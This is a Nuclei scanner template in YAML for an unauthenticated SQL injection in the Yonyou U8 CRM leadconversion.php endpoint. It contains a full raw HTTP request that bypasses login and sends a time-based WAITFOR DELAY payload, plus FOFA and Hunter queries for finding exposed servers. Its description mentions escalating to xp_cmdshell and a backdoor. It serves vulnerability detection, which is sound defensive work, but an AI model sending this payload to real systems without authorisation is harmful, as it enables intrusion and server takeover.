id: yonyou-u8-crm-leadconversion-sqli
info:
  name: 用友 U8 CRM leadconversion.php - sqli
  author: leadlife
  severity: high
  description: 用友U8+CRM系统getDeptName存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9FgetDeptName%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: app="用友U8CRM"
    hunter-query: title="用友U8CRM"
  tags: yonyou,oa,u8crm,sqli

http:
  - raw:
      - |
        @timeout: 15s
        POST /lead/leadconversion.php?DontCheckLogin=1&Action=getDeptName HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: PHPSESSID=bgsesstimeout-;
        Content-Type: application/x-www-form-urlencoded; charset=utf-8
        Connection: close

        userid=1%27;WAITFOR+DELAY+%270:0:6%27--
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and